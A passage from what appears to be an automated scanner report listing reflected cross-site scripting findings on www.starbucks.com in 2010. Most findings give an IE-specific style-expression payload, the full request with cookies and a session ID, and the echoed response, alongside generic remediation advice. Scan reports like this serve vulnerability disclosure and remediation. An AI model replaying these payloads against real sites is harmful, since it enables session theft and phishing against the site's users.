The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 69adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae was submitted in the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter. This input was echoed as 69adb style=x:expression(alert(1)) 21e0c039cae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the 8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8974f%20style%3dx%3aexpression(alert(1))%20727be240e75 was submitted in the 8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e parameter. This input was echoed as 8974f style=x:expression(alert(1)) 727be240e75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e=18974f%20style%3dx%3aexpression(alert(1))%20727be240e75 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; _chartbeat2=qspoj3z1snwoz3gj
The value of the 8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9d18d%20style%3dx%3aexpression(alert(1))%2099773d5c1aa was submitted in the 8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e parameter. This input was echoed as 9d18d style=x:expression(alert(1)) 99773d5c1aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <param name="flashvars" value="playerType=homepage&playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=19d18d style=x:expression(alert(1)) 99773d5c1aa" /> ...[SNIP]...
3.4. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af12"style="x:expression(alert(1))"9f35c014f5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <param name="flashvars" value="playerType=homepage&playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" /> ...[SNIP]...
3.5. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/about-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949e3"style%3d"x%3aexpression(alert(1))"f35557201b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949e3"style="x:expression(alert(1))"f35557201b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /about-us?949e3"style%3d"x%3aexpression(alert(1))"f35557201b0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:20:47 GMT Connection: close Content-Length: 38360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us?949e3"style="x:expression(alert(1))"f35557201b0=1"/> ...[SNIP]...
3.6. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6ed"style="x:expression(alert(1))"7948577bab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:25 GMT Content-Length: 56826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee?eb6ed"style="x:expression(alert(1))"7948577bab3=1"/> ...[SNIP]...
3.7. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17abe"style="x:expression(alert(1))"ea84b9a66b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn?17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:00:23 GMT Connection: close Content-Length: 37678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn?17abe"style="x:expression(alert(1))"ea84b9a66b2=1"/> ...[SNIP]...
3.8. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn/clover
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ec4"style="x:expression(alert(1))"ceb4d722147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn/clover?20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:04:15 GMT Connection: close Content-Length: 39114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?20ec4"style="x:expression(alert(1))"ceb4d722147=1"/> ...[SNIP]...
3.9. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn/flavors-in-your-cup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5721b"style="x:expression(alert(1))"720e97e12cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn/flavors-in-your-cup?5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:03:56 GMT Connection: close Content-Length: 43928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?5721b"style="x:expression(alert(1))"720e97e12cf=1"/> ...[SNIP]...
3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84807"style%3d"x%3aexpression(alert(1))"1a579164fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84807"style="x:expression(alert(1))"1a579164fdd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions?84807"style%3d"x%3aexpression(alert(1))"1a579164fdd=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:54:39 GMT Connection: close Content-Length: 52482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?84807"style="x:expression(alert(1))"1a579164fdd=1"/> ...[SNIP]...
3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/caramel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72f92"style="x:expression(alert(1))"a4e88aeeae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/caramel?72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:26 GMT Connection: close Content-Length: 42434
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?72f92"style="x:expression(alert(1))"a4e88aeeae4=1"/> ...[SNIP]...
3.12. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/cinnamon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96717"style="x:expression(alert(1))"9bd61317b0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/cinnamon?96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:59 GMT Connection: close Content-Length: 42477
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?96717"style="x:expression(alert(1))"9bd61317b0b=1"/> ...[SNIP]...
3.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/savoring
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da712"style%3d"x%3aexpression(alert(1))"153353c2d05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da712"style="x:expression(alert(1))"153353c2d05 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/savoring?da712"style%3d"x%3aexpression(alert(1))"153353c2d05=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:58:58 GMT Connection: close Content-Length: 41224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?da712"style="x:expression(alert(1))"153353c2d05=1"/> ...[SNIP]...
3.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/vanilla
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b02"style%3d"x%3aexpression(alert(1))"11530d23784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0b02"style="x:expression(alert(1))"11530d23784 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/vanilla?e0b02"style%3d"x%3aexpression(alert(1))"11530d23784=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:43 GMT Connection: close Content-Length: 42403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?e0b02"style="x:expression(alert(1))"11530d23784=1"/> ...[SNIP]...
3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-reserve-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c78ef"style="x:expression(alert(1))"30e6886810a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee?c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:03 GMT Connection: close Content-Length: 52822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?c78ef"style="x:expression(alert(1))"30e6886810a=1"/> ...[SNIP]...
3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c317"style="x:expression(alert(1))"4e1c91bd61f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
